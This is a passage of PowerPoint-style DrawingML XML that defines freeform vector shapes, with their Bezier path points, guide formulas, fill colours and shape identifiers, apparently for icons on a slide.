                        <a:pt x="160" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="165" y="232"/>
                        <a:pt x="199" y="218"/>
                        <a:pt x="193" y="194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39" name="Freeform 495">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{997514A0-C5DF-4668-9BDB-5CFA108843E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761" y="-1883"/>
                  <a:ext cx="24" cy="390"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 10"/>
                    <a:gd name="T1" fmla="*/ 165 h 165"/>
                    <a:gd name="T2" fmla="*/ 9 w 10"/>
                    <a:gd name="T3" fmla="*/ 11 h 165"/>
                    <a:gd name="T4" fmla="*/ 0 w 10"/>
                    <a:gd name="T5" fmla="*/ 0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" h="165">
                      <a:moveTo>
                        <a:pt x="8" y="165"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="131"/>
                        <a:pt x="10" y="15"/>
                        <a:pt x="9" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="7"/>
                        <a:pt x="1" y="7"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:noFill/>
                <a:ln w="6350" cap="rnd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40" name="Freeform 496">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EE87DB4-BCFE-4B85-9CE2-ED59EE79CA9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712" y="-2391"/>
                  <a:ext cx="153" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 29 w 65"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 9 w 65"/>
                    <a:gd name="T3" fmla="*/ 19 h 41"/>
                    <a:gd name="T4" fmla="*/ 15 w 65"/>
                    <a:gd name="T5" fmla="*/ 12 h 41"/>
                    <a:gd name="T6" fmla="*/ 53 w 65"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 56 w 65"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 29 w 65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5" h="41">
                      <a:moveTo>
                        <a:pt x="29" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="37"/>
                        <a:pt x="0" y="23"/>
                        <a:pt x="9" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="16"/>
                        <a:pt x="12" y="15"/>
                        <a:pt x="15" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="10"/>
                        <a:pt x="53" y="0"/>
                        <a:pt x="53" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="21"/>
                        <a:pt x="46" y="25"/>
                        <a:pt x="56" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="65" y="33"/>
                        <a:pt x="45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41" name="Freeform 497">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76313FB9-0EA6-424B-AD0E-3E51D23ECE2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03" y="-2363"/>
                  <a:ext cx="376" cy="447"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 150 w 159"/>
                    <a:gd name="T1" fmla="*/ 48 h 189"/>
                    <a:gd name="T2" fmla="*/ 124 w 159"/>
                    <a:gd name="T3" fmla="*/ 23 h 189"/>
                    <a:gd name="T4" fmla="*/ 123 w 159"/>
                    <a:gd name="T5" fmla="*/ 23 h 189"/>
                    <a:gd name="T6" fmla="*/ 123 w 159"/>
                    <a:gd name="T7" fmla="*/ 23 h 189"/>
                    <a:gd name="T8" fmla="*/ 123 w 159"/>
                    <a:gd name="T9" fmla="*/ 23 h 189"/>
                    <a:gd name="T10" fmla="*/ 122 w 159"/>
                    <a:gd name="T11" fmla="*/ 22 h 189"/>
                    <a:gd name="T12" fmla="*/ 122 w 159"/>
                    <a:gd name="T13" fmla="*/ 22 h 189"/>
                    <a:gd name="T14" fmla="*/ 116 w 159"/>
                    <a:gd name="T15" fmla="*/ 21 h 189"/>
                    <a:gd name="T16" fmla="*/ 116 w 159"/>
                    <a:gd name="T17" fmla="*/ 21 h 189"/>
                    <a:gd name="T18" fmla="*/ 114 w 159"/>
                    <a:gd name="T19" fmla="*/ 20 h 189"/>
                    <a:gd name="T20" fmla="*/ 113 w 159"/>
                    <a:gd name="T21" fmla="*/ 20 h 189"/>
                    <a:gd name="T22" fmla="*/ 111 w 159"/>
                    <a:gd name="T23" fmla="*/ 19 h 189"/>
                    <a:gd name="T24" fmla="*/ 109 w 159"/>
                    <a:gd name="T25" fmla="*/ 19 h 189"/>
                    <a:gd name="T26" fmla="*/ 108 w 159"/>
                    <a:gd name="T27" fmla="*/ 19 h 189"/>
                    <a:gd name="T28" fmla="*/ 106 w 159"/>
                    <a:gd name="T29" fmla="*/ 18 h 189"/>
                    <a:gd name="T30" fmla="*/ 69 w 159"/>
                    <a:gd name="T31" fmla="*/ 71 h 189"/>
                    <a:gd name="T32" fmla="*/ 68 w 159"/>
                    <a:gd name="T33" fmla="*/ 180 h 189"/>
                    <a:gd name="T34" fmla="*/ 69 w 159"/>
                    <a:gd name="T35" fmla="*/ 71 h 189"/>
                    <a:gd name="T36" fmla="*/ 67 w 159"/>
                    <a:gd name="T37" fmla="*/ 62 h 189"/>
                    <a:gd name="T38" fmla="*/ 52 w 159"/>
                    <a:gd name="T39" fmla="*/ 15 h 189"/>
                    <a:gd name="T40" fmla="*/ 52 w 159"/>
                    <a:gd name="T41" fmla="*/ 13 h 189"/>
                    <a:gd name="T42" fmla="*/ 66 w 159"/>
                    <a:gd name="T43" fmla="*/ 7 h 189"/>
                    <a:gd name="T44" fmla="*/ 55 w 159"/>
                    <a:gd name="T45" fmla="*/ 4 h 189"/>
                    <a:gd name="T46" fmla="*/ 55 w 159"/>
                    <a:gd name="T47" fmla="*/ 4 h 189"/>
                    <a:gd name="T48" fmla="*/ 41 w 159"/>
                    <a:gd name="T49" fmla="*/ 1 h 189"/>
                    <a:gd name="T50" fmla="*/ 40 w 159"/>
                    <a:gd name="T51" fmla="*/ 1 h 189"/>
                    <a:gd name="T52" fmla="*/ 12 w 159"/>
                    <a:gd name="T53" fmla="*/ 11 h 189"/>
                    <a:gd name="T54" fmla="*/ 0 w 159"/>
                    <a:gd name="T55" fmla="*/ 73 h 189"/>
                    <a:gd name="T56" fmla="*/ 30 w 159"/>
                    <a:gd name="T57" fmla="*/ 83 h 189"/>
                    <a:gd name="T58" fmla="*/ 35 w 159"/>
                    <a:gd name="T59" fmla="*/ 50 h 189"/>
                    <a:gd name="T60" fmla="*/ 34 w 159"/>
                    <a:gd name="T61" fmla="*/ 163 h 189"/>
                    <a:gd name="T62" fmla="*/ 44 w 159"/>
                    <a:gd name="T63" fmla="*/ 174 h 189"/>
                    <a:gd name="T64" fmla="*/ 94 w 159"/>
                    <a:gd name="T65" fmla="*/ 188 h 189"/>
                    <a:gd name="T66" fmla="*/ 121 w 159"/>
                    <a:gd name="T67" fmla="*/ 168 h 189"/>
                    <a:gd name="T68" fmla="*/ 121 w 159"/>
                    <a:gd name="T69" fmla="*/ 111 h 189"/>
                    <a:gd name="T70" fmla="*/ 119 w 159"/>
                    <a:gd name="T71" fmla="*/ 87 h 189"/>
                    <a:gd name="T72" fmla="*/ 119 w 159"/>
                    <a:gd name="T73" fmla="*/ 82 h 189"/>
                    <a:gd name="T74" fmla="*/ 119 w 159"/>
                    <a:gd name="T75" fmla="*/ 80 h 189"/>
                    <a:gd name="T76" fmla="*/ 118 w 159"/>
                    <a:gd name="T77" fmla="*/ 77 h 189"/>
                    <a:gd name="T78" fmla="*/ 119 w 159"/>
                    <a:gd name="T79" fmla="*/ 87 h 189"/>
                    <a:gd name="T80" fmla="*/ 123 w 159"/>
                    <a:gd name="T81" fmla="*/ 111 h 189"/>
                    <a:gd name="T82" fmla="*/ 159 w 159"/>
                    <a:gd name="T83" fmla="*/ 105 h 189"/>
                    <a:gd name="T84" fmla="*/ 150 w 159"/>
                    <a:gd name="T85" fmla="*/ 48 h 1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59" h="189">
                      <a:moveTo>
                        <a:pt x="150" y="48"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="147" y="31"/>
                        <a:pt x="132" y="26"/>
                        <a:pt x="124" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="23"/>
                        <a:pt x="124" y="23"/>
                        <a:pt x="123" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="123" y="23"/>
                        <a:pt x="123" y="23"/>
                        <a:pt x="123" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="123" y="23"/>
                        <a:pt x="123" y="23"/>
                        <a:pt x="123" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="123" y="23"/>
                        <a:pt x="122" y="23"/>
                        <a:pt x="122" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="122" y="22"/>
                        <a:pt x="122" y="22"/>
                        <a:pt x="122" y="22"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="22"/>
                        <a:pt x="118" y="21"/>
                        <a:pt x="116" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="116" y="21"/>
                        <a:pt x="116" y="21"/>
                        <a:pt x="116" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="115" y="20"/>
                        <a:pt x="114" y="20"/>
                        <a:pt x="114" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="113" y="20"/>
                        <a:pt x="113" y="20"/>
                        <a:pt x="113" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="112" y="20"/>
                        <a:pt x="112" y="19"/>
                        <a:pt x="111" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="110" y="19"/>
                        <a:pt x="110" y="19"/>
                        <a:pt x="109" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="109" y="19"/>
                        <a:pt x="109" y="19"/>
                        <a:pt x="108" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="108" y="18"/>
                        <a:pt x="107" y="18"/>
                        <a:pt x="106" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="87" y="39"/>
                        <a:pt x="69" y="71"/>
                        <a:pt x="69" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="69" y="82"/>
                        <a:pt x="68" y="180"/>
                        <a:pt x="68" y="180"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="69" y="71"/>
                        <a:pt x="69" y="71"/>
                        <a:pt x="69" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="69" y="69"/>
                        <a:pt x="68" y="66"/>
                        <a:pt x="67" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="47"/>
                        <a:pt x="53" y="22"/>
                        <a:pt x="52" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="52" y="14"/>
                        <a:pt x="52" y="13"/>
                        <a:pt x="52" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="7"/>
                        <a:pt x="66" y="7"/>
                        <a:pt x="66" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="6"/>
                        <a:pt x="59" y="5"/>
                        <a:pt x="55" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="55" y="4"/>
                        <a:pt x="55" y="4"/>
                        <a:pt x="55" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="1"/>
                        <a:pt x="47" y="2"/>
                        <a:pt x="41" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="1"/>
                        <a:pt x="41" y="1"/>
                        <a:pt x="40" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="0"/>
                        <a:pt x="14" y="3"/>
                        <a:pt x="12" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="13"/>
                        <a:pt x="6" y="41"/>
                        <a:pt x="0" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="80"/>
                        <a:pt x="25" y="82"/>
                        <a:pt x="30" y="83"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="68"/>
                        <a:pt x="34" y="56"/>
                        <a:pt x="35" y="50"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="34" y="88"/>
                        <a:pt x="34" y="136"/>
                        <a:pt x="34" y="163"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="35" y="168"/>
                        <a:pt x="37" y="173"/>
                        <a:pt x="44" y="174"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="176"/>
                        <a:pt x="87" y="186"/>
                        <a:pt x="94" y="188"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="103" y="189"/>
                        <a:pt x="118" y="180"/>
                        <a:pt x="121" y="168"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="149"/>
                        <a:pt x="121" y="129"/>
                        <a:pt x="121" y="111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="103"/>
                        <a:pt x="120" y="94"/>
                        <a:pt x="119" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="119" y="85"/>
                        <a:pt x="119" y="83"/>
                        <a:pt x="119" y="82"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="119" y="81"/>
                        <a:pt x="119" y="81"/>
                        <a:pt x="119" y="80"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="118" y="79"/>
                        <a:pt x="118" y="78"/>
                        <a:pt x="118" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="119" y="80"/>
                        <a:pt x="119" y="83"/>
                        <a:pt x="119" y="87"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="93"/>
                        <a:pt x="122" y="102"/>
                        <a:pt x="123" y="111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="130" y="112"/>
                        <a:pt x="145" y="111"/>
                        <a:pt x="159" y="105"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="155" y="79"/>
                        <a:pt x="151" y="55"/>
                        <a:pt x="150" y="48"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="39A962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42" name="Freeform 498">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27106CED-B948-4F69-9BF4-E8F8F7C9F72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90" y="-2518"/>
                  <a:ext cx="189" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 38 w 80"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 80"/>
                    <a:gd name="T3" fmla="*/ 42 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 80"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 79 w 80"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 38 w 80"/>
                    <a:gd name="T9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0" h="80">
                      <a:moveTo>
                        <a:pt x="38" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="63"/>
                        <a:pt x="20" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="78"/>
                        <a:pt x="80" y="60"/>
                        <a:pt x="79" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="78" y="17"/>
                        <a:pt x="60" y="0"/>
                        <a:pt x="38" y="1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43" name="Freeform 499">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93D0E44B-DB42-4501-B6FE-1C638F599EE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90" y="-2518"/>
                  <a:ext cx="189" cy="189"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 38 w 80"/>
                    <a:gd name="T1" fmla="*/ 1 h 80"/>
                    <a:gd name="T2" fmla="*/ 1 w 80"/>
                    <a:gd name="T3" fmla="*/ 42 h 80"/>
                    <a:gd name="T4" fmla="*/ 42 w 80"/>
                    <a:gd name="T5" fmla="*/ 79 h 80"/>
                    <a:gd name="T6" fmla="*/ 79 w 80"/>
                    <a:gd name="T7" fmla="*/ 38 h 80"/>
                    <a:gd name="T8" fmla="*/ 38 w 80"/>
                    <a:gd name="T9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0" h="80">
                      <a:moveTo>
                        <a:pt x="38" y="1"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="2"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="1" y="42"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="63"/>
                        <a:pt x="20" y="80"/>
                        <a:pt x="42" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="63" y="78"/>
                        <a:pt x="80" y="60"/>
                        <a:pt x="79" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="78" y="17"/>
                        <a:pt x="60" y="0"/>
                        <a:pt x="38" y="1"/>
                      </a:cubicBezTo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44" name="Freeform 500">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C0D94F9-E482-44B2-B49C-C65E8E0F890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97" y="-2407"/>
                  <a:ext cx="93" cy="78"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 36 w 39"/>
                    <a:gd name="T1" fmla="*/ 14 h 33"/>
                    <a:gd name="T2" fmla="*/ 0 w 39"/>
                    <a:gd name="T3" fmla="*/ 7 h 33"/>
                    <a:gd name="T4" fmla="*/ 20 w 39"/>
                    <a:gd name="T5" fmla="*/ 29 h 33"/>
                    <a:gd name="T6" fmla="*/ 36 w 39"/>
                    <a:gd name="T7" fmla="*/ 14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9" h="33">
                      <a:moveTo>
                        <a:pt x="36" y="14"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="14"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="14"/>
                        <a:pt x="11" y="25"/>
                        <a:pt x="20" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="33"/>
                        <a:pt x="39" y="32"/>
                        <a:pt x="36" y="14"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="9AC1D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45" name="Freeform 501">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F82FBBC-F819-4DBF-A93F-DC99D93EBF0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783" y="-2429"/>
                  <a:ext cx="94" cy="55"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 94 w 94"/>
                    <a:gd name="T1" fmla="*/ 0 h 55"/>
                    <a:gd name="T2" fmla="*/ 0 w 94"/>
                    <a:gd name="T3" fmla="*/ 55 h 55"/>
                    <a:gd name="T4" fmla="*/ 94 w 94"/>
                    <a:gd name="T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4" h="55">
                      <a:moveTo>
                        <a:pt x="94" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="55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46" name="Line 502">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDD5BE81-4190-4C00-8F22-14E7E6C760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>
                  <a:off x="783" y="-2429"/>
                  <a:ext cx="9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47" name="Freeform 503">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBDEF304-D78B-412C-8E96-E92B6292CF8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95" y="-2537"/>
                  <a:ext cx="234" cy="163"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 19 w 99"/>
                    <a:gd name="T1" fmla="*/ 8 h 69"/>
                    <a:gd name="T2" fmla="*/ 0 w 99"/>
                    <a:gd name="T3" fmla="*/ 39 h 69"/>
                    <a:gd name="T4" fmla="*/ 50 w 99"/>
                    <a:gd name="T5" fmla="*/ 54 h 69"/>
                    <a:gd name="T6" fmla="*/ 72 w 99"/>
                    <a:gd name="T7" fmla="*/ 69 h 69"/>
                    <a:gd name="T8" fmla="*/ 19 w 99"/>
                    <a:gd name="T9" fmla="*/ 8 h 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9" h="69">
                      <a:moveTo>
                        <a:pt x="19" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="10"/>
                        <a:pt x="2" y="26"/>
                        <a:pt x="0" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="39"/>
                        <a:pt x="19" y="49"/>
                        <a:pt x="50" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="55"/>
                        <a:pt x="64" y="68"/>
                        <a:pt x="72" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="99" y="16"/>
                        <a:pt x="44" y="0"/>
                        <a:pt x="19" y="8"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="39A962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01" name="Group 504">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3474605-568F-403C-A0A2-7CEE374EDD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3789" y="2203"/>
                <a:ext cx="431" cy="266"/>
                <a:chOff x="16477" y="2634"/>
                <a:chExt cx="2077" cy="1280"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1813" name="Freeform 505">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDB7A8F7-EED2-4EEF-B3DA-B8688F54801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7207" y="3456"/>
                  <a:ext cx="135" cy="151"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 48 w 57"/>
                    <a:gd name="T1" fmla="*/ 57 h 64"/>
                    <a:gd name="T2" fmla="*/ 12 w 57"/>
                    <a:gd name="T3" fmla="*/ 45 h 64"/>
                    <a:gd name="T4" fmla="*/ 10 w 57"/>
                    <a:gd name="T5" fmla="*/ 7 h 64"/>
                    <a:gd name="T6" fmla="*/ 46 w 57"/>
                    <a:gd name="T7" fmla="*/ 19 h 64"/>
                    <a:gd name="T8" fmla="*/ 48 w 57"/>
                    <a:gd name="T9" fmla="*/ 57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64">
                      <a:moveTo>
                        <a:pt x="48" y="57"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="64"/>
                        <a:pt x="22" y="58"/>
                        <a:pt x="12" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="31"/>
                        <a:pt x="0" y="14"/>
                        <a:pt x="10" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="0"/>
                        <a:pt x="35" y="5"/>
                        <a:pt x="46" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="33"/>
                        <a:pt x="57" y="50"/>
                        <a:pt x="48" y="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14" name="Freeform 506">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FEB74FB-4674-4363-AEDB-CD2D4EC7FBCE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="17207" y="3458"/>
                  <a:ext cx="135" cy="144"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 38 w 57"/>
                    <a:gd name="T1" fmla="*/ 61 h 61"/>
                    <a:gd name="T2" fmla="*/ 9 w 57"/>
                    <a:gd name="T3" fmla="*/ 45 h 61"/>
                    <a:gd name="T4" fmla="*/ 9 w 57"/>
                    <a:gd name="T5" fmla="*/ 45 h 61"/>
                    <a:gd name="T6" fmla="*/ 0 w 57"/>
                    <a:gd name="T7" fmla="*/ 21 h 61"/>
                    <a:gd name="T8" fmla="*/ 0 w 57"/>
                    <a:gd name="T9" fmla="*/ 21 h 61"/>
                    <a:gd name="T10" fmla="*/ 8 w 57"/>
                    <a:gd name="T11" fmla="*/ 4 h 61"/>
                    <a:gd name="T12" fmla="*/ 8 w 57"/>
                    <a:gd name="T13" fmla="*/ 4 h 61"/>
                    <a:gd name="T14" fmla="*/ 20 w 57"/>
                    <a:gd name="T15" fmla="*/ 0 h 61"/>
                    <a:gd name="T16" fmla="*/ 20 w 57"/>
                    <a:gd name="T17" fmla="*/ 0 h 61"/>
                    <a:gd name="T18" fmla="*/ 48 w 57"/>
                    <a:gd name="T19" fmla="*/ 16 h 61"/>
                    <a:gd name="T20" fmla="*/ 48 w 57"/>
                    <a:gd name="T21" fmla="*/ 16 h 61"/>
                    <a:gd name="T22" fmla="*/ 57 w 57"/>
                    <a:gd name="T23" fmla="*/ 41 h 61"/>
                    <a:gd name="T24" fmla="*/ 57 w 57"/>
                    <a:gd name="T25" fmla="*/ 41 h 61"/>
                    <a:gd name="T26" fmla="*/ 49 w 57"/>
                    <a:gd name="T27" fmla="*/ 58 h 61"/>
                    <a:gd name="T28" fmla="*/ 49 w 57"/>
                    <a:gd name="T29" fmla="*/ 58 h 61"/>
                    <a:gd name="T30" fmla="*/ 49 w 57"/>
                    <a:gd name="T31" fmla="*/ 58 h 61"/>
                    <a:gd name="T32" fmla="*/ 38 w 57"/>
                    <a:gd name="T33" fmla="*/ 61 h 61"/>
                    <a:gd name="T34" fmla="*/ 38 w 57"/>
                    <a:gd name="T35" fmla="*/ 61 h 61"/>
                    <a:gd name="T36" fmla="*/ 38 w 57"/>
                    <a:gd name="T37" fmla="*/ 61 h 61"/>
                    <a:gd name="T38" fmla="*/ 20 w 57"/>
                    <a:gd name="T39" fmla="*/ 5 h 61"/>
                    <a:gd name="T40" fmla="*/ 11 w 57"/>
                    <a:gd name="T41" fmla="*/ 8 h 61"/>
                    <a:gd name="T42" fmla="*/ 11 w 57"/>
                    <a:gd name="T43" fmla="*/ 8 h 61"/>
                    <a:gd name="T44" fmla="*/ 6 w 57"/>
                    <a:gd name="T45" fmla="*/ 21 h 61"/>
                    <a:gd name="T46" fmla="*/ 6 w 57"/>
                    <a:gd name="T47" fmla="*/ 21 h 61"/>
                    <a:gd name="T48" fmla="*/ 14 w 57"/>
                    <a:gd name="T49" fmla="*/ 42 h 61"/>
                    <a:gd name="T50" fmla="*/ 14 w 57"/>
                    <a:gd name="T51" fmla="*/ 42 h 61"/>
                    <a:gd name="T52" fmla="*/ 38 w 57"/>
                    <a:gd name="T53" fmla="*/ 56 h 61"/>
